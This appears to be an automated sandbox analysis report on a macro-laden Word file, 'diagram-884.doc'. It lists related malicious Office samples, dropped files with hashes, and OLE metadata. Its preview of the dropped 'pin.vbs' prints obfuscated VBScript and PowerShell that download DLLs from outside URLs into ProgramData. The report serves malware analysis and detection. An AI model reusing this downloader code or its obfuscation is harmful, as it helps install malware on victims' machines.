	PHOTP.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	Shipment Document BL,INV and packing list.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-595.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	quotation 2021-004.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	diagram-378.doc	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	PS-AVP2-202098-96.docx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	x93 Suppression de la suspension.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	TaD.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	32352788.docx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	swift.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199
	product_list.xlsx	Get hash	malicious	Browse	204.11.58.87 149.56.235.225 192.185.115.199

Dropped Files

No context

Created / dropped Files

C:\ProgramData\pin.vbs Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2153
Entropy (8bit):	5.612352836242948
Encrypted:	false
SSDEEP:	48:BRS4bVNxCYPyHv+thACnCB1ROkAMeMxMEMoYMjBgjqZQjG5TgvVo1M/:LbVHC3HqAsi1RHTKlEa2HAB/
MD5:	588C2373B69AD580A5D445263F832CC4
SHA1:	B32D9B002B488D3885368E8707A3F2CC1445DF65
SHA-256:	5B8AFAE5E2A2AFA180B689CD0E86F7561D62B81780B5E67FCC2A824E4D59B12D
SHA-512:	FF21D25E90F23583B6D6C0315A6862E96CF09D2DB098882DC0C5E90FF9FE647A98F050653DAD7D9DE42A174F7AF1BE6BDE89E8CE1D9854285E6E7D7B62C913D7
Malicious:	true
Preview:	Dim WAITPLZ, WS..WAITPLZ = DateAdd(Chr(115), 4, Now())..Do Until (Now() > WAITPLZ)..Loop....LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;"....LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;"....LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;"....LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1960F7F0-F768-4A99-BA9A-679D126DC5D5}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.254389147721384
Encrypted:	false
SSDEEP:	1536:C6CL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CjJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	70715B453B28BCDD9EB5E3A4646FA4E7
SHA1:	8CA4219FE163F220F2C0892D823B0DCB5F2E1B63
SHA-256:	D2B1AF1AEEA026834F8B36F9A6FAF17401606E952F4222C03C7E34BAFC9194AD
SHA-512:	CD0A90FB68BC847D6761F805AD65C7E4EDA6A126AA5DA29F42700189291004916EF1EA591E63A927F737A6DE7C95A39A6B2C54A6FB704C7E229E74D0F4655564
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-884.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Thu Sep 16 22:58:17 2021, length=286720, window=hide
Category:	dropped
Size (bytes):	2038
Entropy (8bit):	4.526294425808486
Encrypted:	false
SSDEEP:	24:8Rjok/XTuzI+5sPNe7nPM4s5Dv3qRE/7Es2Rjok/XTuzI+5sPNe7nPM4s5Dv3qRY:8mk/XTkfyPNXQRWf2mk/XTkfyPNXQRWB
MD5:	943FFDADB67AA27D24DCF18C539375DC
SHA1:	92A7A9772A3938E7D6DBFA203E909EC16BC3C183
SHA-256:	E3CA06F2F8319D890276D0E19492F5D0173044E0CB0925FD28111CE7CCBA72F7
SHA-512:	B47FE944FFF446690B70DB53EBDE62330B24D946D51B29E663FB81A4E427C9B96D040FD0DB1AFD3E1122AD8CD0B58F7D3E16E4937273F717ADD968008DEEE68F
Malicious:	false
Preview:	L..................F.... ......?......?....l.V....`...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S"...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..`..0SI. .DIAGRA~1.DOC..L.......S ..S .*.........................d.i.a.g.r.a.m.-.8.8.4...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop\diagram-884.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.i.a.g.r.a.m.-.8.8.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9..g............[D_....3N...W...9.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	71
Entropy (8bit):	4.305984845449387
Encrypted:	false
SSDEEP:	3:M16rU5ru4oZFd5ru4omX16rU5ru4ov:M4rw64SR64Crw64y
MD5:	2C17E6235D61A7116728074DB758A7A7
SHA1:	11F9F2C4AE6749101689EA7B46D4ED0451FECA10
SHA-256:	DC626E85B9483FABE591C7C6E8B78218B834BBC15596DD2ABFC2A4A50EB70E8A
SHA-512:	B94110AB58DDBAC12593B3EF5A542BF5CCC3BF09D6520303591F19C522BFC3AEBFA24E9A890C465253CCE70B368A815101CF179F64B4161AAF259FCDD6702D07
Malicious:	false
Preview:	[doc]..diagram-884.LNK=0..diagram-884.LNK=0..[doc]..diagram-884.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707526
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
MD5:	6462452E1083FFF3724A32DC01771E8B
SHA1:	244116899824E727C5C399064F004C71D88F7254
SHA-256:	869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
SHA-512:	303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EZUU6Z1EEHNESJOJTGM.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5806802484040414
Encrypted:	false
SSDEEP:	96:YhQCcMqhqvsqvJCwoLz4hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:Yi0oLz4igHnorxzI/3Eh1A2
MD5:	0319B21E92A51ACD383203297B37AAA2
SHA1:	65AFEBC7A7D80B0DBB8C54A72322029F0CBBA3B3
SHA-256:	C4FF0AEFD306C28B369666B0BC086935B2425DD063210847DBCE16D4EE794552
SHA-512:	30F67AEB966EF51A47128F8745F33DDD549C8D22C9843266B55B9C8B935113C456F3C0F7B03359229DB8A9D2FDE77BD5064B6F437207C8714053AB7820D4130D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SK.. PROGRA~3..D.......:..0SK....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5806802484040414
Encrypted:	false
SSDEEP:	96:YhQCcMqhqvsqvJCwoLz4hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:Yi0oLz4igHnorxzI/3Eh1A2
MD5:	0319B21E92A51ACD383203297B37AAA2
SHA1:	65AFEBC7A7D80B0DBB8C54A72322029F0CBBA3B3
SHA-256:	C4FF0AEFD306C28B369666B0BC086935B2425DD063210847DBCE16D4EE794552
SHA-512:	30F67AEB966EF51A47128F8745F33DDD549C8D22C9843266B55B9C8B935113C456F3C0F7B03359229DB8A9D2FDE77BD5064B6F437207C8714053AB7820D4130D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SK.. PROGRA~3..D.......:..0SK....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58136759558522
Encrypted:	false
SSDEEP:	96:chQCcMqhqvsqvJCwoLz8hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:ci0oLz8igHnorxzI/3Eh1A2
MD5:	030B0FAE62AC7CDF01AFA20AA212C644
SHA1:	B8046D3C0B28EA4D814915758B5B947BE423CED9
SHA-256:	5FD507ADE6EAC53B4C77FB0949B23A650D4F684942191560CE11F01DCB32367A
SHA-512:	BBC8DDC4771A77A2315075A10F2D755B0B53E13FF84EDF37654006BE168A46846EA72EF81BD08E79416410AC7DB9C5AF59FE3870E18E7DD68D05385795692BD4
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SQ.. PROGRA~3..D.......:..0SQ....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5806802484040414
Encrypted:	false
SSDEEP:	96:YhQCcMqhqvsqvJCwoLz4hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:Yi0oLz4igHnorxzI/3Eh1A2
MD5:	0319B21E92A51ACD383203297B37AAA2
SHA1:	65AFEBC7A7D80B0DBB8C54A72322029F0CBBA3B3
SHA-256:	C4FF0AEFD306C28B369666B0BC086935B2425DD063210847DBCE16D4EE794552
SHA-512:	30F67AEB966EF51A47128F8745F33DDD549C8D22C9843266B55B9C8B935113C456F3C0F7B03359229DB8A9D2FDE77BD5064B6F437207C8714053AB7820D4130D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SK.. PROGRA~3..D.......:..0SK....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRS1X41I3E0W4529WXKM.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58136759558522
Encrypted:	false
SSDEEP:	96:chQCcMqhqvsqvJCwoLz8hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:ci0oLz8igHnorxzI/3Eh1A2
MD5:	030B0FAE62AC7CDF01AFA20AA212C644
SHA1:	B8046D3C0B28EA4D814915758B5B947BE423CED9
SHA-256:	5FD507ADE6EAC53B4C77FB0949B23A650D4F684942191560CE11F01DCB32367A
SHA-512:	BBC8DDC4771A77A2315075A10F2D755B0B53E13FF84EDF37654006BE168A46846EA72EF81BD08E79416410AC7DB9C5AF59FE3870E18E7DD68D05385795692BD4
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SQ.. PROGRA~3..D.......:..0SQ....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RVAC7IF4RL0ITUO02ZRM.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58136759558522
Encrypted:	false
SSDEEP:	96:chQCcMqhqvsqvJCwoLz8hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:ci0oLz8igHnorxzI/3Eh1A2
MD5:	030B0FAE62AC7CDF01AFA20AA212C644
SHA1:	B8046D3C0B28EA4D814915758B5B947BE423CED9
SHA-256:	5FD507ADE6EAC53B4C77FB0949B23A650D4F684942191560CE11F01DCB32367A
SHA-512:	BBC8DDC4771A77A2315075A10F2D755B0B53E13FF84EDF37654006BE168A46846EA72EF81BD08E79416410AC7DB9C5AF59FE3870E18E7DD68D05385795692BD4
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SQ.. PROGRA~3..D.......:..0SQ....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T629K64P5Q872I06B2KO.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5806802484040414
Encrypted:	false
SSDEEP:	96:YhQCcMqhqvsqvJCwoLz4hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:Yi0oLz4igHnorxzI/3Eh1A2
MD5:	0319B21E92A51ACD383203297B37AAA2
SHA1:	65AFEBC7A7D80B0DBB8C54A72322029F0CBBA3B3
SHA-256:	C4FF0AEFD306C28B369666B0BC086935B2425DD063210847DBCE16D4EE794552
SHA-512:	30F67AEB966EF51A47128F8745F33DDD549C8D22C9843266B55B9C8B935113C456F3C0F7B03359229DB8A9D2FDE77BD5064B6F437207C8714053AB7820D4130D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SK.. PROGRA~3..D.......:..0SK....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W3V0CVJZ98SWKPVTWYZJ.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5806802484040414
Encrypted:	false
SSDEEP:	96:YhQCcMqhqvsqvJCwoLz4hQCcMqhqvsEHyqvJCworxzIuYaHsyYy5h0lUV1A2:Yi0oLz4igHnorxzI/3Eh1A2
MD5:	0319B21E92A51ACD383203297B37AAA2
SHA1:	65AFEBC7A7D80B0DBB8C54A72322029F0CBBA3B3
SHA-256:	C4FF0AEFD306C28B369666B0BC086935B2425DD063210847DBCE16D4EE794552
SHA-512:	30F67AEB966EF51A47128F8745F33DDD549C8D22C9843266B55B9C8B935113C456F3C0F7B03359229DB8A9D2FDE77BD5064B6F437207C8714053AB7820D4130D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....0SK.. PROGRA~3..D.......:..0SK....k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$agram-884.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707526
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
MD5:	6462452E1083FFF3724A32DC01771E8B
SHA1:	244116899824E727C5C399064F004C71D88F7254
SHA-256:	869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
SHA-512:	303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: x, Template: Normal.dotm, Last Saved By: x, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 16 10:44:00 2021, Last Saved Time/Date: Thu Sep 16 10:44:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	6.843687641588864
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	diagram-884.doc
File size:	283674
MD5:	3d6a59b2463cbae2e8cd5cc4d0859477
SHA1:	10ecd94e610b89337e384a29ce3fdf77526f2a33
SHA256:	e4aa5d33b7c3c4cd956735f32316bf58002882ae37a46c8d6acc8921fdcc8f11
SHA512:	2ecf9dd1e613562238d5765c78e7d01f6712c4e819b8af23073a4b85198f69eef9030cf2e7423c99f0f8d5b4f093aa00cd909c79003719dbcbadd9c148aa64ad
SSDEEP:	3072:OWx4E8St67hXqGbaNRsqYr6ZCz1xNYm9qhWmmyKyEw9u9qLF0EYouFCoOVagZN:nxLHtyhvba8qYroThW9yZEJoEou4ZN
File Content Preview:	........................>.......................#..............................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "diagram-884.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Title:
Subject:
Author:	x
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	x
Revion Number:	2
Total Edit Time:	0
Create Time:	2021-09-16 09:44:00
Last Saved Time:	2021-09-16 09:44:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1251
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:	SPecialiST RePack
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Form.frm, Stream Size: 6655

General
Stream Path:	Macros/VBA/Form
VBA File Name:	Form.frm
Stream Size:	6655
